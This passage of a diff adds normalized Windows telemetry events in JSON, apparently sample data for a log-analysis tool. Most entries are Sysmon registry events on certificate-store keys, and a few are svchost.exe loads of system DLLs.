"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 
Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"image_load", + "image_name": "samlib.dll", + "image_path": "C:\\Windows\\System32\\samlib.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903090000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "es.dll", + "image_path": "C:\\Windows\\System32\\es.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903240000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 